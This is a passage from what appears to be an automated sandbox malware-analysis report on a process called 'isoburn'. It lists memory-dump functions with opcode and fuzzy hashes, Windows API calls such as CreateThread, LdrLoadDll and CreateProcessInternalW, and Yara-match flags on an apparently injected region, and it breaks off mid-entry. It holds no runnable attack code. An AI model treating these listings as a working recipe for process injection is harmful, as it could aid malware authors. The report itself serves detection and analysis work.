                                                                                • Opcode ID: 3621026d410d2ec6354794a40fa6e96e53b75f7bd9e559f900ac12b398c57152
                                                                                • Instruction ID: 0c2b7e7e3b5f22e4207b718bcff7e495c5c4b61d9c85317de43b967ee7688a7f
                                                                                • Opcode Fuzzy Hash: 3621026d410d2ec6354794a40fa6e96e53b75f7bd9e559f900ac12b398c57152
                                                                                • Instruction Fuzzy Hash: CA90023160140042618071688C459474009BFE1215755D121A0D9A560D8559D9655AA5
                                                                                Function 04EA2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: fede1c6ae5207bd431af8d08bc91b284b529814454fc58b78d4f98e7f171f543
                                                                                • Instruction ID: 00fe86a4446ca28067fa1025fdd14d405d4e86d38903c17e8c9e3e8b56366c52
                                                                                • Opcode Fuzzy Hash: fede1c6ae5207bd431af8d08bc91b284b529814454fc58b78d4f98e7f171f543
                                                                                • Instruction Fuzzy Hash: 8B90027134140442F14071584815B470009DBE1305F55D015E1866564D8619DD526566
                                                                                Function 04EA39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: f37a8809a1c13fb5d1b4d18545aed57803534cc32cab22e6b5b2773d8c02cbf8
                                                                                • Instruction ID: 838b4968f53d06a9b2fb4e75887256985afa4d5996af5070b29e05f3cf4183a8
                                                                                • Opcode Fuzzy Hash: f37a8809a1c13fb5d1b4d18545aed57803534cc32cab22e6b5b2773d8c02cbf8
                                                                                • Instruction Fuzzy Hash: 4790023124545102F190715C48056574009BBE0205F55D021A0C165A4D8555D9556661
                                                                                Function 04EA2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: a2f129a342d1006fb4c8e63041ddb053eb4ede64f567be89474f6096bb91d62d
                                                                                • Instruction ID: cd3a2fadbb3c8e8f98328af33669d7bd05534e2964d2c45efc9342de18b71618
                                                                                • Opcode Fuzzy Hash: a2f129a342d1006fb4c8e63041ddb053eb4ede64f567be89474f6096bb91d62d
                                                                                • Instruction Fuzzy Hash: 51900235221400022185B5580A0554B0449ABD6355395D015F1C175A0CC621D9655761
                                                                                Function 04EA2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: e294cc926d7b9e41a9cbaa2fc6d7ab2c7e2b966a38a540953923ae8fc7622f4c
                                                                                • Instruction ID: 408a73bb330c1026184ead4ea8a6c4d94a51597ce0f6bbe43f9dc2d4276549d7
                                                                                • Opcode Fuzzy Hash: e294cc926d7b9e41a9cbaa2fc6d7ab2c7e2b966a38a540953923ae8fc7622f4c
                                                                                • Instruction Fuzzy Hash: EC900235211400032145B5580B05547004A9BD5355355D021F1817560CD621D9615561
                                                                                Function 04EA2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3d6b0bebc00078a83481f8c947c2ebd0c4170cff690b088460827352cbe6341e
                                                                                • Instruction ID: c1578bd9c48feb44ae48b235cc5be8c839d67ad1e79b6a15233403a8ffb95cbe
                                                                                • Opcode Fuzzy Hash: 3d6b0bebc00078a83481f8c947c2ebd0c4170cff690b088460827352cbe6341e
                                                                                • Instruction Fuzzy Hash: D990023120544842F18071584805A8700199BD0309F55D011A08666A4D9625DE55BAA1
                                                                                Function 04EA2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 49eb703464b8bda8499265a7476968c348c59b60ca332237c89726ff337ecc5b
                                                                                • Instruction ID: 414deb848080d124ffe397a4aeb56d0ffe0b761cf4381e684322959a08999fb8
                                                                                • Opcode Fuzzy Hash: 49eb703464b8bda8499265a7476968c348c59b60ca332237c89726ff337ecc5b
                                                                                • Instruction Fuzzy Hash: C890023120140802F1C07158480568B00099BD1305F95D015A0827664DCA15DB597BE1
                                                                                Function 04EA2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: e05b715e0e670ff3659bf4b839212679d28475d97c6a25df72cea165f387bbd9
                                                                                • Instruction ID: 4541d0437718fbaa843f5f3739ee47356a3742eec19fc7bfe9c6b67ee8be0b80
                                                                                • Opcode Fuzzy Hash: e05b715e0e670ff3659bf4b839212679d28475d97c6a25df72cea165f387bbd9
                                                                                • Instruction Fuzzy Hash: 0490023160540802F1907158481578700099BD0305F55D011A0826664D8755DB557AE1
                                                                                Function 04EA2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 5cac7fdfa58d505f535cefcefb7600aa0642c2eef5ef0795e3b0f7e7869c9883
                                                                                • Instruction ID: 5ffcb66789a060aaa705213322d35ccc76d34d19bf602ff80e2d94ebafd10bb4
                                                                                • Opcode Fuzzy Hash: 5cac7fdfa58d505f535cefcefb7600aa0642c2eef5ef0795e3b0f7e7869c9883
                                                                                • Instruction Fuzzy Hash: 9990027120240003614571584815657400E9BE0205B55D021E18165A0DC525D9916565
                                                                                Function 02A49E36 Relevance: 35.1, APIs: 1, Strings: 19, Instructions: 134threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 28 2a49e36-2a49e37 29 2a49e0c-2a49e11 28->29 30 2a49e39-2a4a152 28->30 31 2a49e30-2a49e35 29->31 32 2a49e13-2a49e2f call 2a6ca47 CreateThread 29->32 33 2a4a15c-2a4a163 30->33 35 2a4a165-2a4a19c 33->35 36 2a4a19e 33->36 35->33 38 2a4a1a5-2a4a1af 36->38 39 2a4a1e7-2a4a1f0 38->39 40 2a4a1b1-2a4a1cb 38->40 43 2a4a206-2a4a210 39->43 44 2a4a1f2-2a4a204 39->44 41 2a4a1d2-2a4a1d4 40->41 42 2a4a1cd-2a4a1d1 40->42 46 2a4a1e5 41->46 47 2a4a1d6-2a4a1df 41->47 42->41 45 2a4a221-2a4a22d 43->45 44->39 48 2a4a23d-2a4a241 45->48 49 2a4a22f-2a4a23b 45->49 46->38 47->46 50 2a4a243-2a4a25a 48->50 51 2a4a25c-2a4a274 48->51 49->45 50->48 53 2a4a285-2a4a291 51->53 54 2a4a293-2a4a2a6 53->54 55 2a4a2a8-2a4a2b2 53->55 54->53 56 2a4a2c3-2a4a2cf 55->56 58 2a4a2e5-2a4a2ee 56->58 59 2a4a2d1-2a4a2e3 56->59 60 2a4a2f4-2a4a2f7 58->60 61 2a4a510-2a4a517 58->61 59->56 63 2a4a2fd-2a4a304 60->63 64 2a4a519-2a4a548 61->64 65 2a4a54a-2a4a551 61->65 66 2a4a306-2a4a329 63->66 67 2a4a32b-2a4a335 63->67 64->61 68 2a4a5c3-2a4a5cd 65->68 69 2a4a553-2a4a55d 65->69 66->63 70 2a4a346-2a4a352 67->70 71 2a4a5de-2a4a5e7 68->71 72 2a4a56e-2a4a57a 69->72 73 2a4a354-2a4a363 70->73 74 2a4a365-2a4a36c 70->74 75 2a4a5fe-2a4a607 71->75 76 2a4a5e9-2a4a5fc 71->76 77 2a4a57c-2a4a58b 72->77 78 2a4a58d call 2a6b0e0 72->78 73->70 80 2a4a393-2a4a39d 74->80 81 2a4a36e-2a4a391 74->81 76->71 84 2a4a55f-2a4a568 77->84 85 2a4a592-2a4a59e 78->85 86 2a4a3ae-2a4a3ba 80->86 81->74 84->72 85->68 87 2a4a5a0-2a4a5c1 85->87 88 2a4a3bc-2a4a3c9 86->88 89 2a4a3cb-2a4a3da 86->89 87->85 88->86 90 2a4a3dc-2a4a3e3 89->90 91 2a4a40d-2a4a417 89->91 94 2a4a3e5-2a4a3fb 90->94 95 2a4a408 90->95 93 2a4a428-2a4a434 91->93 96 2a4a436-2a4a448 93->96 97 2a4a44a-2a4a454 93->97 98 2a4a406 94->98 99 2a4a3fd-2a4a403 94->99 95->61 96->93 100 2a4a465-2a4a471 97->100 98->90 99->98 102 2a4a493-2a4a499 100->102 103 2a4a473-2a4a480 100->103 106 2a4a49d-2a4a4a4 102->106 104 2a4a491 103->104 105 2a4a482-2a4a48b 103->105 104->100 105->104 108 2a4a4a6-2a4a4bc 106->108 109 2a4a4c9-2a4a4d3 106->109 111 2a4a4c7 108->111 112 2a4a4be-2a4a4c4 108->112 110 2a4a4e4-2a4a4ed 109->110 113 2a4a4ef-2a4a4fb 110->113 114 2a4a50b 110->114 111->106 112->111 115 2a4a4fd-2a4a503 113->115 116 2a4a509 113->116 114->58 115->116 116->110
                                                                                APIs
                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A49E25
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID: ")$#$#$$u$'$-$-~$.$@k$H$T$Z/$]5$f?$pa$r$vj$}$K
                                                                                • API String ID: 2422867632-999386047
                                                                                • Opcode ID: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                                                • Instruction ID: 54b490f78a96428fb48dd66b51fb873a00caa3909f9e3826bb15dd921417ccdf
                                                                                • Opcode Fuzzy Hash: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                                                • Instruction Fuzzy Hash: 4C8168B0D05769CBEB20CF85C9597DEBAB1BB45308F1081D9D15C3B281CBBA1A89CF95
                                                                                Function 02A5F3F9 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeUninitialize
                                                                                • String ID: @J7<
                                                                                • API String ID: 3442037557-2016760708
                                                                                • Opcode ID: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                                                • Instruction ID: 437562d68a14be04118f64ebd19506079776e4fc4ba01ef16fb16ba9a937a4b2
                                                                                • Opcode Fuzzy Hash: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                                                • Instruction Fuzzy Hash: 734142B5A0020AAFDB00DFD8D880DEFB7B9FF89304B148559E915E7614DB74AE45CBA0
                                                                                Function 02A5F400 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeUninitialize
                                                                                • String ID: @J7<
                                                                                • API String ID: 3442037557-2016760708
                                                                                • Opcode ID: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                                                • Instruction ID: eb65618f8fcb5b8a8b9127608f117f00a6b4a80d468ade13865649268d5666bd
                                                                                • Opcode Fuzzy Hash: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                                                • Instruction Fuzzy Hash: 423121B5A0060A9FDB00DFD8C8809EFB7B9BF89304B108559E915E7214DB75EE45CBA0
                                                                                Function 02A63980 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 108sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 02A63A5B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: wininet.dll
                                                                                • API String ID: 3472027048-3354682871
                                                                                • Opcode ID: 1ff3d2c6287c48c0358b3c1be33f9c72c9022aad4df32ef87cc455a3175c6b48
                                                                                • Instruction ID: 44864ca2dbcb255d9dd6b39221dac732e97f8490403033dd74bd65e6401ae070
                                                                                • Opcode Fuzzy Hash: 1ff3d2c6287c48c0358b3c1be33f9c72c9022aad4df32ef87cc455a3175c6b48
                                                                                • Instruction Fuzzy Hash: 3231D0B0600605BBDB14DFA4CC88FFBB7B9EB88714F50451DE919AB240CB70AA41CFA4
                                                                                Function 02A54460 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A544D2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                                • Instruction ID: 6bba6dfa9eb678604cc7fe664146cd365dba259ee084eff69b60b48b7f118fe2
                                                                                • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                                • Instruction Fuzzy Hash: CD011EB5E8020DBBDB10DFE5DD85FAEB3799B44708F0041A5AE1897241FA31EB54CB91
                                                                                Function 02A697B0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,02A5820E,00000010,?,?,?,00000044,?,00000010,02A5820E,?,?,?), ref: 02A69813
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInternalProcess
                                                                                • String ID:
                                                                                • API String ID: 2186235152-0
                                                                                • Opcode ID: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                                                • Instruction ID: 3eae40862f2628e217d7c0e29ed0ddc311bdcd8ecdafad449685112bb7e9f47b
                                                                                • Opcode Fuzzy Hash: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                                                • Instruction Fuzzy Hash: 6C0184B6204648BBCB54DE9DDD80EDB77ADAF8C754F518108BA19E3241DA30F8518BA4
                                                                                Function 02A49DE0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A49E25
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                • Opcode ID: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                                                • Instruction ID: b76c44efc33336ef173895653897b9e38956609c48d85d99c34c7ff9866ba832
                                                                                • Opcode Fuzzy Hash: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                                                • Instruction Fuzzy Hash: DFF0307338031436D22062E99D02FD7B68D8B94B65F540015F61CEA2C0DEA1F44146A5
                                                                                Function 02A49DDC Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A49E25
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                • Opcode ID: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                                                • Instruction ID: 2a4fa4684c50116ee658b81c055e47edea1f68bbfabd05cf1f18debc14fbebfc
                                                                                • Opcode Fuzzy Hash: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                                                • Instruction Fuzzy Hash: C0F06D7228131432E23062A98D42FD7769D8B95B61F540015F618EB2C0DEA5F84186F9
                                                                                Function 02A696D0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(02A51969,?,02A657BB,02A51969,02A6556F,02A657BB,?,02A51969,02A6556F,00001000,?,?,00000000), ref: 02A6970C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                • Instruction ID: c3bc6ddddc60f30d0ed2398e19e4872075c29f7e33115b6b58145e5e04a5cbdc
                                                                                • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                • Instruction Fuzzy Hash: 9BE065B6244204BBD714EE98DC44FAB77ADEFC8750F004009F90CA7282EA30B9108BB4
                                                                                Function 02A69720 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5DE58B5E,00000007,00000000,00000004,00000000,02A53CE4,000000F4), ref: 02A6975C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0
                                                                                • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                                • Instruction ID: 05fd37b57ee7a2acf7ed43711d2bc761be8418f5a9d4be530814d6329eb71a15
                                                                                • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                                • Instruction Fuzzy Hash: AAE06D76240205BBD614EE58DD45FAB37ADDFC8710F004418F908A7242DA70B9518AB4
                                                                                Function 02A58250 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02A5827C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                                                • Instruction ID: c2af5b275158baab22337858710913559c929ecd2ea01f54a113109bf1d0927e
                                                                                • Opcode Fuzzy Hash: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                                                • Instruction Fuzzy Hash: 14E0DF352403082AEB206AA89C85FAA33489B48728F4C0660BD6CCB2C1EB38E8814590
                                                                                Function 02A58037 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02A51C50,02A67EAF,02A6556F,02A51C1D), ref: 02A58073
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                                                • Instruction ID: f57c3865d4e64ed877d2b412d1398e126a05e7987370b485b3b789634fcc6c5f
                                                                                • Opcode Fuzzy Hash: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                                                • Instruction Fuzzy Hash: C5E0C2B12811002EF310AAB89C0AFA6328C6BA4718F4000A8B51CE7281DF74E0404564
                                                                                Function 02A58040 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02A51C50,02A67EAF,02A6556F,02A51C1D), ref: 02A58073
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
                                                                                • Instruction ID: ced4ff8ce0899153b3be1a407cfa6941eb844d68d96ea13c9e7878de9a5d7362
                                                                                • Opcode Fuzzy Hash: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
